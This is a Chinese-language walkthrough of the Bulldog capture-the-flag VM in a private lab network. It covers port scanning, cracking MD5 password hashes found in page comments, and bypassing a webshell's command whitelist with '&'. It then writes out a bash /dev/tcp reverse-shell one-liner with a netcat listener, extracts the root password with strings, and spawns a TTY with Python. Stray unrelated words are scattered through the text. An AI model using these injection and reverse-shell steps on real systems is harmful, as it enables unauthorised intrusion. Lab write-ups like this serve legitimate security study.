kali和bulldog靶機的的ip地址在同一個網段
本測試環境:
kali
:192.168.56.102
bulldog
:192.168.56.101python
利用kali的netdiscover
工具掃描靶機ip地址
web
kali和bulldog靶機的的ip地址在同一個網段
本測試環境:
kali
:192.168.56.102
bulldog
:192.168.56.101shell
利用kali的nmap
工具掃描靶機ip地址瀏覽器
nmap -p- 192.168.56.101
掃描目標靶機端口的詳細服務信息bash
nmap -p23,80,8080 -A -T4 192.168.56.101
web服務是python2
用瀏覽器訪問192.168.56.101
並未發現異常;接下來掃描網站
發現了 /dev /admin robots.txt
/admin 是一個登陸頁面,SQL注入並未成功
tcp
/robots.txt 並未發現異常
工具
訪問/dev,發現了webshell鏈接,可是顯示須要驗證身份,可能須要先登陸纔能有權限使用此webshell
學習
在註釋中發現了異常
MD5值加密,使用在線解密網站解密試試。
成功解密兩個帳號密碼:測試
白名單限制了使用的命令,經過&
繞過
網站
echo 'bash -i >& /dev/tcp/192.168.56.102/6666 0>&1'|bash
反彈shell到kali上nc -nvlp 6666
使用普通用戶的權限並無發現要得到的信息,因而要提高root權限
在/home目錄下發現bulldogadmin文件夾,看文件名以爲裏面應該有東西
發現了隱藏文件夾,進去看看裏面的東西
使用cat
命令沒有發現異常,使用strings
發現下面了信息,去掉應該H是root密碼---> SUPERultimatePASSWORDyouCANTget
在得到的shell界面直接切換root用戶報錯
因而使用python腳本
python -c 'import pty; pty.spawn("/bin/bash")'
輸入剛纔獲取的密碼便可
成功獲取flag
後續技能學習:
python -c 'import pty; pty.spawn("/bin/bash")'
此類經常使用的shell代碼